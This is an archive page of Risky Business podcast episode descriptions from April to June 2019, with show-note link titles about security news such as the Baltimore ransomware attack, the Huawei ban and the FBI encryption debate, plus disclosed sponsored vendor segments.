Patrick Gray

Risky Business

Risky Business


Risky Business is a weekly information security podcast featuring news and in-depth interviews with industry luminaries. Launched in February 2007, Risky Business is a must-listen digest for information security pros. With a running time of approximately 50-60 minutes, Risky Business is pacy; a security podcast without the waffle.





Feature podcast: An interview with Jim Baker, former general counsel, FBI

Jun 15, 2019


This is the first edition of a new series of podcasts we’re doing here at Risky.Biz that will focus on cyber policy issues. The Hewlett Foundation approached us a while back to see if we’d be interested in doing this series we jumped at the opportunity.

The Foundation funds a lot of interesting people and work in the cybersecurity space. So the idea is pretty simple: we can talk to some of Hewlett’s grant recipients or experts in its network about pressing policy issues and turn those conversations into podcasts. The whole idea is to get some policy perspectives out there among the Risky Business audience, which, funnily enough, includes a lot of policy people.

Our first cab off the rank is this interview with Jim Baker. He joined the Department of Justice in 1990 and rose through the ranks to become the FBI general counsel in January 2014, a position he held until December 2017. So of course he was running all things legal for the FBI during the Apple-FBI dispute over a locked iPhone 5C recovered from the gunman responsible for the San Bernardino shooting.

Baker was the US Government’s point man on all things encryption, taking stances that outraged technologists and reinvigorated a policy debate that had – at least to a degree – stagnated for years. These days, Jim Baker serves as Director of the R Street think tank’s National Security and Cybersecurity Program.

This interview focusses on the so-called encryption wars. The FBI and other law enforcement/intelligence agencies want better access to encrypted material, while technologists say that’s impossible to accomplish without introducing unacceptable risks into the technology ecosystem. Baker shares his view on the topic.

The Australian government law enforcement and intelligence agencies guide to the Assistance and Access Act, which is mentioned in the introduction to the podcast, can be found here. (Ironically enough, served over http!)

PLEASE NOTE: Jim Baker joined our meeting via a phone call, so the audio quality here isn’t up to our usual standards. Sorry about that!

Risky Business #545 -- US Government loses control of customs mugshot database

Jun 12, 2019


On this week’s show Adam Boileau and Patrick Gray discuss the week’s news, including:

CBP loses photo and license plate database Some Android phones shipped with backdoor Info on Google’s cloud outage USG ramps up “defend forward” Trump and Mnuchin can’t get their stories straight on Huawei The latest from Baltimore, more on that RDP bug TalkTalk hacker sentenced Much, much more

This week’s show is brought to you by Remediant! Remediant CEO Tim Keeler will be along this week to have a chinwag. We’ll talk about how simple security tech is really en vogue these days and how that’s a good thing.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes CBP says hackers stole license plate and travelers' photos | ZDNet Hackers Breach Company That Makes License Plate Readers for U.S. Government - VICE Maker of US border's license-plate scanning tech ransacked by hacker, blueprints and files dumped online • The Register Google confirms that advanced backdoor came preinstalled on Android devices | Ars Technica Two-thirds of iOS apps disable ATS, an iOS security feature | ZDNet How a Google Cloud Catch-22 Broke the Internet | WIRED Google Cloud Status Dashboard U.S. ramping up offensive cyber measures to stop economic attacks, Bolton says Trump and Mnuchin on Huawei, trade, national security Huawei executive labeled a 'moral vacuum' in heated UK hearing - CNN Russia and Iran Plan to Fundamentally Isolate the Internet | WIRED For two hours, a large chunk of European mobile traffic was rerouted through China | ZDNet Baltimore’s bill for ransomware: Over $18 million, so far | Ars Technica A botnet is brute-forcing over 1.5 million RDP servers all over the world | ZDNet Microsoft warns about email spam campaign abusing Office vulnerability | ZDNet SymCrypt Bug Would Let Attacker "Take Down Entire Windows Fleet" Senator asks Department of Justice if it can keep a lid on its software exploits 'You don't stand a chance': how the press freedom argument will go for Assange TalkTalk hacker Daniel Kelley sentenced to four years - BBC News A Push to Protect Campaigns from Hackers Hits an FEC Roadblock | WIRED Top voting machine maker reverses position on election security, promises paper ballots | TechCrunch Windows 10 zero-day details published on GitHub | ZDNet Microsoft NTLM Flaws Expose All Windows Machines to RCE Attacks New RCE vulnerability impacts nearly half of the internet's email servers | ZDNet Major HSM vulnerabilities impact banks, cloud providers, governments | ZDNet 'RAMBleed' Rowhammer attack can now steal data, not just alter it | ZDNet A backdoor in Optergy tech could remotely shut down a smart building ‘with one click’ | TechCrunch That push notification on your phone might be a phishing attempt New Spam Campaign Controlled by Attackers via DNS TXT Records Fortune 500 giant Tech Data exposed customer and billing data | TechCrunch FBI Issues Warning on ‘Secure’ Websites Used For Phishing Diebold Nixdorf warns customers of RCE bug in older ATMs | ZDNet Microsoft Blocks Some Bluetooth Devices Due to Security Risks Apple's 'Find My' Feature Uses Some Very Clever Cryptography | WIRED VLC 3.0.7 is Biggest Security Release Due to EU Bounty Program How to create an EVIL LTE Twin – Adam Toscher – Medium

Risky Business #544 -- NYTimes Baltimore report falls over

Jun 5, 2019


On this week’s show Patrick and Adam talk through all the week’s security news, including:

NYTimes story on EternalBlue and Baltimore is bunk An RDP worm is feeling kind of inevitable Iran is still getting Shadowbrokersed Intercept has a great feature on SID Today dumps Australian Federal Police crack down on national security journalism Phantom Secure CEO gets nine years and loses $80m Silk Road 2.0 admin must be an amazing snitch Another Bitcoin tumbler bites the dust Much, much more

This week’s sponsor interview is with Marco Slaviero of Thinkst Canary.

Marco is joining us this week to talk about how he thinks web application-based deception techniques are kind of a waste of time right now. We talk about how deception approaches work best in privileged domains, then we talk about how security teams do better when they have a dedicated ops developer.

Show notes Ruppersberger: NSA has no evidence EternalBlue was in Baltimore attack Sen. Van Hollen: Government sees no EternalBlue in Baltimore ransomware attack N.S.A. Denies Its Cyberweapon Was Used in Baltimore Attack, Congressman Says - The New York Times Report: No ‘Eternal Blue’ Exploit Found in Baltimore City Ransomware — Krebs on Security Baltimore ransomware perp pinky-swears he didn’t use NSA exploit | Ars Technica NSA points to two-year patching window in remarks about Baltimore incident Microsoft's BlueKeep Bug Isn't Getting Patched Fast Enough | WIRED Even the NSA is urging Windows users to patch BlueKeep (CVE-2019-0708) | ZDNet New Iranian hacking tool leaked on Telegram | ZDNet Meltdown Showed Extent of NSA Surveillance — and Other Tales From Hundreds of Intelligence Documents Federal police raid home of News Corp journalist Annika Smethurst | Australia news | The Guardian - Your favorite newspapers and magazines. CEO Who Sold Encrypted Phones to the Sinaloa Cartel Sentenced to Nine Years - VICE Silk Road 2.0 Admin May Only Be Prosecuted For Tax Crimes After Cooperating with Feds - VICE Bitcoin Blender Exits Cryptocurrency Mixing On Its Own Terms Rights groups probe investments in NSO Group’s private equity firm Lorenzo Franceschi-Bicchierai on Twitter: "In his new book, @josephmenn argues that Phineas Fisher, the hacktivist that breached FinFisher and Hacking Team, is perhaps a Russian intelligence front.…" Much @Stake: The Band of Hackers That Defined an Era | WIRED Google Cloud goes down, taking YouTube, Gmail, Snapchat, and others with it | ZDNet China 'rigs' 5G test to favour Huawei - NZ Herald Russian military moves closer to replacing Windows with Astra Linux | ZDNet Maze Ransomware Says Computer Type Determines Ransom Amount Phishing Emails Pretend to be Office 365 'File Deletion' Alerts Unpatched Flaw Affects All Docker Versions, Exploits Ready Zero-Day Flaw in Windows 10 Task Scheduler Gets Micropatch 0patch Blog: Another Task Scheduler 0day, Another Task Scheduler Micropatch (The SandboxEscaper Saga) Flipboard says hackers stole user details | ZDNet Google Is Finally Making Chrome Extensions More Secure | WIRED Westpac cyber atttack: PayID platform hack exposes private details on 100,000 Australians Terry Zhang on Twitter: "Received a 40,000$ bounty from @msftsecresponse through @Bugcrowd for a critical Auth Bypass i found on Microsoft Cloud.Also will join the team and talk about it on the BlackHat this year.Thanks for the great bounty and the opportunity sharing on a big stage.…" New research shows personalized ads are just barely more efficient than dumb ads | ZDNet Stephen A. Ridley on Twitter: "It has been 10 years since we reverse engineered the MS08-67 patch and published the FIRST public vuln PoC (which was used by the Confiker Worm authors). BUT, it has only been about a year since we got an angry email blaming us for the Confiker worm.…" Malware Sandbox Online | Free Trial Thinkst Canary

Risky Business #543 -- NYTimes blames NSA for Baltimore hacks, Assange faces espionage charges

May 29, 2019


Adam Boileau couldn’t make it this week, but that’s ok because we’ve got former Facebook CSO and current Stanford adjunct professor Alex Stamos filling in for him in today’s show. He’ll be talking through all the week’s security news, including:

NYTimes report blames Baltimore ransomware attack on leaked NSA exploit Assange to face espionage charges, extradition fight looming SanboxEscaper just keeps dropping those 0days Fury over Facebook’s response to doctored Pelosi video Much, much more

This week’s sponsor interview with David Warburton of F5 Networks. You know F5 as a blinky-light box manufacturer. Load balancers, SSL termination, that sort of stuff. Not exactly a growth industry at the moment, so they’re pivoting.

They’ve dropped $670m on NGINX – f5 now owns the NGINX company – and they’re making all sorts of moves in the appsec space. That interview is mostly about F5’s business, but I found it interesting because what do you do when you’re an $8bn company that makes data-centre equipment and that industry starts going into decline?

Links to everything discussed are below, and you can follow Patrick or Alex on Twitter if that’s your thing.

Show notes In Baltimore and Beyond, a Stolen N.S.A. Tool Wreaks Havoc - The New York Times Thomas Rid on Twitter: "Meanwhile I feel rather uncomfortable about being quoted in said NYT story. Although the bigger point stands: whoever was behind Shadowbrokers must be held accountable, and USG should not get away with publicly ignoring this historic leak." Eternally Blue: Baltimore City leaders blame NSA for ransomware attack | Ars Technica Google bots shut down Baltimore officials’ ransomware-workaround Gmail accounts | Ars Technica CyberSecPolitics: Baltimore is not EternalBlue Errata Security: A lesson in journalism vs. cybersecurity Intense scanning activity detected for BlueKeep RDP flaw | ZDNet Researcher publishes Windows zero-days for the third day in a row | ZDNet Cyber Command's latest VirusTotal upload has been linked to an active attack The Latest Julian Assange Indictment Is an Assault on Press Freedom | WIRED Here's How a Facebook Exec Defended Leaving Up That Fake Nancy Pelosi Video Facebook scrubbed 2.2 billion fake accounts in the first quarter of 2019, a new high U.S. Navy Creating a 350 Billion Record Social Media Archive A--Global Social Media Archive, 350 billion digital data records (text) - Federal Business Opportunities: Opportunities Amazon shareholders reject facial recognition sale ban to governments | TechCrunch Facial Recognition Has Already Reached Its Breaking Point | WIRED Android and iOS devices impacted by new sensor calibration attack | ZDNet Privacy Preserving Ad Click Attribution For the Web | WebKit German Minister Wants Secure Messengers To Decrypt Chats European police seize BestMixer, saying it helped launder $200 million worth of cryptocurrency Chinese military to replace Windows OS amid fears of US hacking | ZDNet First American Financial Corp. Leaked Hundreds of Millions of Title Insurance Records — Krebs on Security Australian tech unicorn Canva suffers security breach | ZDNet Equifax is spending a ton of money on cybersecurity. Wall Street analysts don't like it. Democratic Party’s network security still lags behind GOP, researchers find | Ars Technica NSS ISSUES STATEMENT — NSS Labs, Inc. CrowdStrike, NSS Labs resolve court battle over product testing | ZDNet Security Engineer, Detection - Google - Sydney NSW, Australia - Google Careers Security Engineer, Information Security and Privacy Incident Response - Google - Sydney NSW, Australia - Google Careers Malware Sandbox Online | Free Trial F5 Networks | Secure application delivery

Risky Biz Soap Box: VMRay CEO Carsten Willems talks sandbox tech

May 23, 2019


This is not the regular Risky Business weekly show, the Soap Box series of podcasts that run on Risky.Biz are wholly sponsored. Everyone you hear in Soap Box paid to be here.

With that disclaimer out of the way, this is actually a really interesting conversation. Carsten Willems is the co-founder and CEO of VMRay, a company that makes… well.. what do you call it? Is it an incident response tool? Is it a detection tool? Or is it just a good hypervisor-based sandbox that you can use to do both of those things?

I’m going to say it’s the third – VMRay is a company that makes a great hyper-visor sandbox and has applied that technology to both response and detection.

In an ideal world you’d have a team of malware reversers on staff pulling apart every single binary that looks shady. But this isn’t a perfect world, so that’s never going to happen. So the original use case that Carsten and his team set out to solve was around automating malware reversing. They build a hyper-visor based sandbox that’s very hard to bypass, you can run your standard build on it, throw binaries and documents at it and see what blows up. That’s really the primary use case here.

But there is a second use case, which is detection. VMRay can give you a pretty decent risk score on samples, and they’ve entered into a few OEM arrangements with vendors to provide that extra level of detection.

I’d never met Carsten Willems before we prepared this podcast, but it’s safe to say we hit it off. This podcast basically turned into Carsten telling his story, the story of where VMRay came from and where he wants it to go. Enjoy!

Show notes Malware Sandbox Online | Free Trial

Risky Business #542 -- Confusion reigns over Huawei ban

May 22, 2019


On this week’s show Patrick and Adam talk through all the week’s security news, including:

New executive order paved way for Huawei ban Google pulls service from Huawei No wait, that’s not right, it’s for new handsets The ban’s now reversed to allow them to continue the support that they didn’t have to discontinue? I’m so confused ¯_(ツ)_/¯ Israeli broadcaster fingers Hamas over Eurovision coverage hack New moves to regulate offensive cyber services Salesforce has a bad time Instagram influencers have a bad time (Hah!) OGUsers pwned Much, much more

This week’s show is brought to you by CMD Security. They make security software for Linux that does two things – firstly it gives you visibility into what’s happening on your Linux workloads, which actions are being performed by which accounts, that sort of thing. The second thing it does is allow you to lock down accounts by action, rather than by traditional privilege. They’re funded by Google Ventures, among others, and although they’re a relatively small and new company I think they’re going to do really well.

Jake was just at a MITRE conference in Brussels that was all about the Attack Matrix. He’s joining me this week to have a bit of talk about his experience at that event, then we’ll be talking through some of the issues he’s seeing out there in Linux cloud workload land. Jake’s a great communicator and a very smart guy and that interview is a lot of fun.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes White House executive order sets path for ban on Huawei Exclusive: Google suspends some business with Huawei after Trump blacklist - source - Reuters Google's Huawei Android restrictions: what does it mean for you? [Updated] | TechRadar Trump grants temporary reprieve from Huawei ban | Financial Times Israel’s national broadcaster accuses Hamas of Eurovision hack | Jewish News Lawmakers seek probe on U.S. hacking services sold globally - Reuters U.S. lawmakers call on spy chief to rein in spread of hacking tools - Reuters Facebook bans Israeli company that's been sharing disinfo on West African politics Faulty database script brings Salesforce to its knees | ZDNet Millions of Instagram influencers had their private contact data scraped and exposed | TechCrunch Account Hijacking Forum OGusers Hacked — Krebs on Security The Most Expensive Lesson Of My Life: Details of SIM port hack Chinese cyberspies breached TeamViewer in 2016 | ZDNet Baltimore ransomware nightmare could last weeks more, with big consequences | Ars Technica Ohio school sends students home because of Trickbot malware infection | ZDNet Google Will Replace Titan Security Key Over a Bluetooth Flaw | WIRED Bluetooth's Complexity Has Become a Security Risk | WIRED First official version of Tor Browser for Android released on the Play Store | ZDNet Root account misconfigurations found in 20% of top 1,000 Docker containers | ZDNet The Crowd, The Source… – CTUS.IO New windows LPE from non-admin :) : AskNetsec How CSIRO Computers Were Secretly Used To Mine Bitcoin | 10 daily Company behind LeakedSource pleads guilty in Canada | ZDNet Bots Tampering with TLS to Avoid Detection - Akamai Security Intelligence and Threat Research Blog Hackers abuse ASUS cloud service to install backdoor on users’ PCs | Ars Technica The radio navigation planes use to land safely is insecure and can be hacked | Ars Technica 1801 - Visual Voicemail for iPhone: Use-after-free in IMAP NAMESPACE processing - project-zero - Monorail Hackers Inject Magecart Card Skimmer in Forbes’ Subscription Site Microsoft releases new version of Attack Surface Analyzer utility | ZDNet Cisco Upgrades Remote Code Execution Flaws to Critical Severity Additional mitigations for speculative execution vulnerabilities in Intel CPUs - Apple Support AT&T Homepage Mistakenly Warns Users of a Non-Existent Data Breach - VICE Encryption fix may now be dead - Request a live demo_

Risky Biz Soap Box: Signal Sciences on serverless, app-layer deception and more

May 16, 2019


This isn’t our weekly news and current affairs show, this is a wholly sponsored podcast we do here at Risky Biz. The idea behind Soap Box is vendors pay to come on to the show and talk about the things they want to talk about.

Today’s Soap Box is brought to you by Signal Sciences. If you’re not familiar with them, they make web security software. If you operate a website and you’re looking to auto-block a lot of the common attacks and attack techniques that are likely to be directed against your website, then Signal Sciences are definitely worth a look.

Their whole pitch is really about making software that’s easy to deploy. You just drop it on your web server or run it as a WAF proxy, and bang, you’re done. Most of their clients run this software in full blocking mode out of the gate and don’t have any issues.

It’s really, really good at blocking stuff like cred stuffing and weird bot activity, as well as your typical OWASPY-style attacks.

Signal Sciences Trusted Appsec Advisor Phillip Maddux is our guest today. We spoke about a bunch of stuff really: the future of appsec, how the pivot to serverless is changing things. Then we talk about app-layer deception, and finally Phillip basically takes a dump on the bulk of RASP solutions out there.


Show notes Dear RASP: We Need to Talk About the Friction in Our Relationship

Risky Business #541 -- NSO Group makes global headlines. What next?

May 15, 2019


On this week’s show Patrick and Adam talk through all the week’s security news, including:

NSO Group WhatsApp vuln coverage goes nuclear Activists targeted by NSO malware in hiding in west after CIA tipoffs Cisco Trust Anchor drags on sea floor Linux kernel bugs likely overhyped Adobe patches insane number of CVEs Microsoft patches rumoured GCHQ VEP’d RDP bug New hardware bugs affect Intel processors SHA-1 collisions become much more practical Major US anti-virus firms owned hard

This week’s sponsor interview with Ryan Kalember of Proofpoint. Ryan is a listener, and when he heard Adam talking about how password rotations actually result in crappy passwords, it hit a nerve with him. He says Proofpoint, via its CASBY product, is seeing a lot of targeted credential stuffing campaigns cycling through variations of passwords that have appeared in dumps.

Apparently the bad guys are hip to what a typical password rotation variation looks like and they’re using this knowledge to better direct their cred stuffing attempts.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes How Hackers Broke WhatsApp With Just a Phone Call | WIRED Israel gives 'Pegasus' spyware to countries like Saudi Arabia CIA Sent Warnings to 3 Khashoggi Associates About New Saudi Threats | Time WhatsApp Hack Shows End-to-End Encryption Is Pointless - Bloomberg The NSO WhatsApp Vulnerability - This is How It Happened - Check Point Research It’s Almost Impossible to Tell if Your iPhone Has Been Hacked - VICE Human rights groups to ask Israeli court to revoke NSO Group’s export license A Cisco Router Bug Has Massive Global Implications | WIRED Linux Kernel Prior to 5.0.8 Vulnerable to Remote Code Execution Security Updates Released for Adobe Flash Player, Reader, and Media Encoder Microsoft Patches ‘Wormable’ Flaw in Windows XP, 7 and Windows 2003 — Krebs on Security Microsoft SharePoint vulnerability allows hackers to sift through servers, Saudi authorities warn Two years after WannaCry, a million computers remain at risk | TechCrunch Intel CPUs impacted by new Zombieload side-channel attack | ZDNet ZombieLoad attack lets hackers steal data from Intel chips - The Verge Patch status for the new MDS attacks against Intel CPUs | ZDNet SHA-1 collision attacks are now actually practical and a looming danger | ZDNet NVIDIA Patches High Severity Windows GPU Display Driver Flaws Keyloggers Injected in Web Trust Seal Supply Chain Attack Fxmsp Chat Logs Reveal the Hacked Antivirus Vendors, AVs Respond New Details Emerge of Fxmsp's Hacking of Antivirus Companies DOJ Says Chinese Hackers Attacked Anthem, but Not Why | WIRED “RobbinHood” ransomware takes down Baltimore City government networks | Ars Technica Julian Assange to face revived rape investigation in Sweden Former NSA analyst charged in leak of classified documents to reporter New leaks of Iranian cyber-espionage operations hit Telegram and the Dark Web | ZDNet Jokeroo Ransomware as a Service Pulls an Exit Scam Nigerian BEC Scammers Shifting to RATs As Tool of Choice Mozilla offers research grant for a way to embed Tor inside Firefox | ZDNet Experts Doubt Russian Claims That Cryptographic Flaw Was a Coincidence - VICE Microsoft recommends using a separate device for administrative tasks | ZDNet Unsecured server exposes data for 85% of all Panama citizens | ZDNet

Risky Business #540 -- In depth: Hamas cyber unit destroyed in air strike

May 8, 2019


On this week’s show Patrick Gray and Adam Boileau discuss the week’s security news, including:

IDF takes out Hamas cyber HQ (Features commentary from Bobby Chesney and Klon Kitchen) NYTimes mangles Symantec’s “Buckeye” research Lots of dark web arrests SAP exploits not all they’re cracked up to be Magecart-style attacks spread to other platforms Tech-led crackdown on Chinese-muslims intensifies Japan to create “defensive malware”

This week’s sponsor interview is with Duo Security advisory CSO Richard Archdeacon and we’ll be talking about zero trust networks. Richard isn’t so worried about every vendor under the sun claiming to be a zero trust tech company. He doesn’t think that’s going to derail the move to zero trust architectures because the move towards them is too strong.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Israel Defense Forces on Twitter: "CLEARED FOR RELEASE: We thwarted an attempted Hamas cyber offensive against Israeli targets. Following our successful cyber defensive operation, we targeted a building where the Hamas cyber operatives work. HamasCyberHQ.exe has been removed.…" Crossing a Cyber Rubicon? Overreactions to the IDF’s Strike on the Hamas Cyber Facility - Lawfare Daniel Moore on Twitter: "It's also possible that they claim this is a kinetic response to a cyber-attack, but in reality the IDF is just bombing more convenient, low-risk elements of Hamas out of its extensive target bank. So possibly more capitalising on an opportunity than direct retaliation.…" Inbar Raz on Twitter: "If there had been only one strike, and it had been directed at the Cyber unit, then that would have been a remarkable and unusual event. But it wasn’t. It’s just one more building with “Hamas” written all over it. 3/N…" Buckeye: Espionage Outfit Used Equation Group Tools Prior to Shadow Brokers Leak | Symantec Blogs How Chinese Spies Got the N.S.A.’s Hacking Tools, and Used Them for Attacks - The New York Times A Mysterious Hacker Group Is On a Supply Chain Hijacking Spree | WIRED FBI has seized Deep Dot Web and arrested its administrators | TechCrunch Law enforcement seizes dark web market after moderator leaks backend credentials | ZDNet Public 10KBLAZE Exploits May Impact 90% of SAP Production Systems sap_ms/ at master · gelim/sap_ms · GitHub JavaScript card sniffing attacks spread to other e-commerce platforms | ZDNet A hacker is wiping Git repositories and asking for a ransom | ZDNet Mysterious hacker has been selling Windows 0-days to APT groups for three years | ZDNet China uses biometrics and digital scanning 'data doors' to track Muslim minority | ZDNet Uyghurs the People of Xinjiang - Rear Vision - ABC Radio National (Australian Broadcasting Corporation) CIA sets up shop on the anonymous, encrypted Tor network - CNET China making 'rapid progress' on potency of cyber-operations, Pentagon says Japanese government to create and maintain defensive malware | ZDNet Hacker takes over 29 IoT botnets | ZDNet Only six TSA staffers are overseeing US oil & gas pipeline security | ZDNet Dutch intelligence warns of escalating Russian, Chinese cyberattacks in the Netherlands NSA unmasked more U.S. entities caught in foreign cyber-espionage efforts last year WordPress finally gets the security features a third of the Internet deserves | ZDNet Verizon, T-Mobile, Sprint, and AT&T Hit With Class Action Lawsuit Over Selling Customers’ Location Data - VICE Firefox add-ons disabled en masse after Mozilla certificate issue | ZDNet Labor asks questions of WeChat over doctored accounts, 'fake news' Evil Clippy Makes Malicious Office Docs that Dodge Detection Dell laptops and computers vulnerable to remote hijacks | ZDNet AWS IAM Exploitation – Security Risk Advisors Zero Trust Evaluation Guide: For the Workforce | Duo Security

Snake Oilers 9 part 2: Rapid7 talks SOAR, Trend Micro on its API-based email security play

May 2, 2019


This isn’t the regular weekly risky biz news and current affairs show, this is the special podcast series we do here at Risky Biz HQ where we take that dirty, dirty vendor cash and let security companies tell the audience all about what they do. Think of it as show and tell for security vendors!

In this edition we’ve got three more vendors vying for your hard-earned bread. We’ll be hearing from Rapid7 on their InsightConnect product, that one used to be known as Komand. What can you automate and orchestrate with it? How does it work? Who’s using it? What are they doing with it?

Then we’ll be hearing from Trend Micro about their O365 mail security product, and this one is legit interesting for one very simple reason – the deployment method. Most of the mail security firms basically make you route your mail through them.

In this case what Trend has done is create a mail security product that just fiddles with your mailboxes through the Microsoft O365 API. They have literally set up a demo account for an enterprise over a beer at a bar. So yeah, I suspect we’ll be seeing more mail security products deploying this way… and because it’s show and tell, Trend will be along to talk about some of the bells and whistles that come with that product.

Then finally we’ll be hearing from Cybermerc. This is a group based out of Canberra in Australia. They’ve done a lot of enterprise deception hybrid hardware/consulting, that’s something they’ve gotten very good at. They also do a lot of cyber cyber training, but now they’re trying to market a managed service towards small to medium businesses – those with 50 to a few hundred seats. A managed honeypot, some internal vuln scans, and a partridge in a pear tree!

Show notes Security Orchestration and Automation with InsightConnect | Rapid7 XGen Email Security Smart Protection for Office 365 | Trend Micro Cybermerc

Risky Business #539 -- Docker Hub owned, Cloudflare, Bloomberg under fire

May 1, 2019


On this week’s show Patrick Gray and Adam Boileau discuss the week’s security news, including:

Docker Hub owned That Confluence bug we were talking about a couple of weeks ago got wormified Oracle WebLogic users also having a bad time Cloudflare faces investor pressure over providing services to Nazis Slack warns investors of possible nation-state attacks against it Norsk Hydro puts dollar value on ransomware incident Bloomberg publishes another ridiculous security story Much, much more!

This week’s sponsor interview is with Casey Ellis, the CTO and co-founder of Bugcrowd.

As most of you are probably aware, Bugcrowd announced its so-called “next generation penetration testing” product last year, a move followed some months later by its competitor HackerOne. With others in the bounty space already offering these types of penetration testing packages, it looks like these efforts are here to stay.

But where do crowdsourced penetration tests sit in the wider penetration testing market? Are they coming after the Insomnia and Atredis Partners type firms? The NCCs? The shonky nessus-scan “penetration testers”? Well, not surprisingly Casey argues that this is a new sub-niche in the market and he makes a pretty compelling case to support that argument.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Docker Hub hack exposed data of 190,000 users | ZDNet two-factor authentication · Issue #358 · docker/hub-feedback · GitHub Slack warns investors of a high risk of cyber-attacks impacting stock performance | ZDNet Vulnerable Confluence Servers Get Infected with Ransomware, Trojans Recent Oracle WebLogic zero-day used to infect servers with ransomware | ZDNet Norsk Hydro: Attack Cost $50M « The SIM Swap Fix That the US Isn't Using | WIRED California synagogue shooting casts harsh light on mutual-fund darling Cloudflare - Reuters Sleeping Giants on Twitter: "REMINDER: 8Chan, where the anti-Semitic shooter from today AND the New Zealand shooter posted manifestos and their fans cheer the killings, is protected by @Cloudflare and their CEO @eastdakota, who doesn’t have any regrets about it at all.…" Catalin Cimpanu on Twitter: "Today in infosec news: Another low-quality Bloomberg article where the reporter converts a random 10-year-old long-time-patched vulnerability into a national security threat.... because Bloomberg reporters get paid for "market-shifting news" ....which means "horrendous clickbait"…" Oh dear. Secret Huawei enterprise router snoop 'backdoor' was Telnet service, sighs Vodafone • The Register Man who allegedly leaked CIA hacking tools says he's been tortured and is owed $50 billion Hackers Steal and Ransom Financial Data Related to Some of the World’s Largest Companies - Motherboard NSA's Russian cyberthreat task force is now permanent DNS hacks are attacks on critical infrastructure, senior U.S. diplomat says New DHS order pushes agencies to quickly patch vulnerabilities Microsoft is considering dropping its Windows password expiration policy | TechCrunch Microsoft Outlook Email Breach Targeted Cryptocurrency Users - Motherboard Chinese dev jailed and fined for posting DJI's private keys on Github • The Register Probable Russian Navy covert camera whale discovered by Norwegians | Ars Technica CARBANAK Week Part Four: The CARBANAK Desktop Video Player « CARBANAK Week Part Four: The CARBANAK Desktop Video Player | FireEye Inc Port Scanning, Spoofing & Blacklists – notdan – Medium Bat bomb - Wikipedia Project Pigeon - Wikipedia Next Gen Pen Testing

Risky Business #538 -- Marcus Hutchins is a milkshake duck, Iranian APTs doxxed and more

Apr 25, 2019


On this week’s show Patrick Gray and Adam Boileau discuss the week’s security news, including:

Marcus Hutchins faces his milkshake duck moment Iranian APT crew gets Shadowbrokersed DNS interference campaign is actually two large-scale actors UK to use some Huawei components in 5G build French Government launches comms app for politicians, it doesn’t go well More detail on CCleaner/ASUS crew Carbanak source found on VT (lol) Wall Street Market exit scams BEC costing US firms $1.3bn PA Much MOAR!

This week’s show is brought to you by Signal Sciences, their CEO Andrew Peterson will be along in this week’s sponsor interview to have a bit of a chat about how a lot of traditional enterprises are running serious business web app shops these days.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Marcus “MalwareTech” Hutchins Pleads Guilty to Writing, Selling Banking Malware — Krebs on Security filsy on Twitter: "The whole internet loves MalwareShake Duck, a lovely duck that saved the internet. *12 months later* We regret to inform you that the duck was the author of malware that stole your grandmothers lifesavings." A Mystery Agent Is Doxing Iran's Hackers and Dumping Their Code | WIRED Patrick Gray on Twitter: "This development raises serious questions, like: 1. When will SIGINT agencies start publishing zines? 2. Which nation state actors will produce the best defacement art and smack talk?" Talos Blog || Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: DNS Hijacking Abuses Trust In Core Internet Service Talos Blog || Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: DNSpionage brings out the Karkoff Wipro Intruders Targeted Other Major IT Firms — Krebs on Security The Weather Channel goes off the air for 90 minutes after ransomware infection | ZDNet Manufacturing giant Aebi Schmidt hit by ransomware | TechCrunch Huawei will help build Britain’s 5G network, despite security concerns - The Verge U.S. and British Intelligence Agencies Downplay Disagreement Over Huawei 5G Huawei frustration boils over as CIA allegedly shows the goods | French government releases in-house IM app to replace WhatsApp and Telegram use | ZDNet Congress sends letter to Google for details on Sensorvault location tracking database | ZDNet Supply Chain Hackers Snuck Malware Into Videogames | WIRED Source code of Carbanak trojan found on VirusTotal | ZDNet A 'Blockchain Bandit' Is Guessing Private Keys and Scoring Millions | WIRED Another dark web marketplace bites the dust --Wall Street Market | ZDNet FBI: US companies lost $1.3 billion in 2018 due to BEC scams | ZDNet Security flaw lets attackers recover private keys from Qualcomm chips | ZDNet Security flaw in EA’s Origin client exposed gamers to hackers | TechCrunch RCE in EA's Origin Desktop Client – Underdog Security – Our blog... More Security Endpoint Tech Isn't Always Better | Decipher Chaos on Twitter: "last week i got to witness an engineering department lose a full day's work because if you put an emoji in a git commit message, Atlassian Bamboo chokes on it forever and you're forced to rebase master, like you should NEVER DO. this was of course referred to as The Emojiency" Australian Lime Scooters Hacked To Say Sexual Things To Riders | Gizmodo Australia Demand More from Your Web Application Security | Signal Sciences

Snake Oilers 9 part 1: The best Snake Oilers edition we've ever run

Apr 23, 2019


On this edition of Snake Oilers you’ll be hearing from three vendors offering what I believe to be excellent security technology. I haven’t personally used this tech, but conceptually everything featured in this edition is The Good Stuff. You’ll see. Or hear. You know what I mean.

First up we’ll be hearing from CMD, they make killer software for Linux that lets you lock down account actions. Not permissions, actions. Do all the default and service accounts you have to run on your Linux fleet terrify you? Well, this is a solution for that. There’s a visibility component there, too.

Then we’ll be hearing from AlphaSOC. When we last spoke to them they were just doing domain-based analytics, but they’ve expanded their tech and now offer IP-based and http request-based analytics. You can deploy AlphaSOC as a Splunk app or hook up to their API any other way you want. They’re offering free trials, but even when you’re on the paid service it’s actually pretty affordable.

The brain behind AlphaSOC is Chris McNab who used to run incident response at NCC Group. He’s seen how the planes crash into the mountains and he has created a product that performs eminently sensible analysis on your traffic and metadata to alert you to badness.

Then finally we’ll be hearing from Nucleus. This is a new company and if your job is managing vulnerabilities and vuln scanners in your org then straight up, just skip to the Nucleus interview immediately. They’ve created a web app that normalises vulnerability scanning information. It’ll take the outputs from Snyk, Rapid7, Checkmarx, Netsparker, OpenVAS, Twistlock, Fortify, Burp Suite, Nessus, Qualys, Acunetix AND others.

It ingests all of this data, normalises it, then plumbs these alerts through to the right people through a multitude of different ticketing systems. If your’e stuck in the 7th layer of Sharepoint or Spreadsheet vulnerability management hell, this is a solution to your problems. You will weep salty tears of joy when you hear this one. Free trials of Nucleus are also available.

Links to the companies featured are below!

Show notes Cmd — Defense in depth for Linux AlphaSOC Overview > Nucleus Security

